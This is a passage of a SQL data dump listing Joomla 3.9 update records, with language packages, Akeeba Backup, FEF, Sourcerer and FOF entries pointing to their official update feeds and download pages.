Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21859,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21860,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21861,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21862,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21863,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21864,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21865,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21866,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21867,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21868,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(21869,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(21870,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(21871,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21872,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21873,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21874,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21875,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21876,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21877,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21878,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21879,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21880,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21881,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21882,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21883,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21884,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21885,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21886,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21887,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21888,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21889,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21890,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21891,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21892,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21893,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21894,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21895,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21896,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21897,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21898,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21899,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21900,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21901,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21902,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21903,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21904,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21905,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21906,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21907,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21908,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21909,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21910,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21911,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21912,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21913,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21914,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21915,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21916,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21917,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21918,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21919,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21920,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21921,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21922,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21923,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21924,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21925,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21926,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21927,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21928,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21929,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21930,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21931,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21932,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21933,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21934,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21935,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21936,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21937,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21938,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21939,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21940,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21941,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21942,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21943,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21944,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21945,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21946,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21947,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21948,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21949,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21950,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21951,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21952,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21953,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21954,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21955,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21956,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21957,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21958,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21959,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21960,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21961,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21962,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21963,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21964,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21965,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21966,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21967,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21968,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21969,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21970,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21971,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21972,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21973,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21974,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21975,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21976,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21977,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21978,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21979,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(21980,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(21981,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(21983,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21984,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21985,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21986,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21987,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21988,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21989,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21990,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21991,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21992,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21993,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21994,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21995,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21996,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21997,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21998,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21999,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22000,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22001,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22002,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22003,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22004,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22005,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22006,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22007,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22008,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22009,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22010,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22011,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22012,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22013,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22014,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22015,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22016,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22017,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22018,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22019,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22020,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22021,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22022,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22023,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22024,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22025,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22026,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22027,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22028,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22029,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22030,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22031,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22032,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22033,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22034,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22035,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22036,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22037,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22038,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22039,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22040,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22041,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22042,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22043,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22044,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22045,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22046,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22047,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22048,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22049,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22050,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22051,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22052,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22053,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22054,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22055,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22056,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22057,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22058,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22059,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22060,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22061,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22062,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22063,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22064,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22065,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22066,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22067,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22068,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22069,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22070,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22071,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22072,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22073,57,0,'English 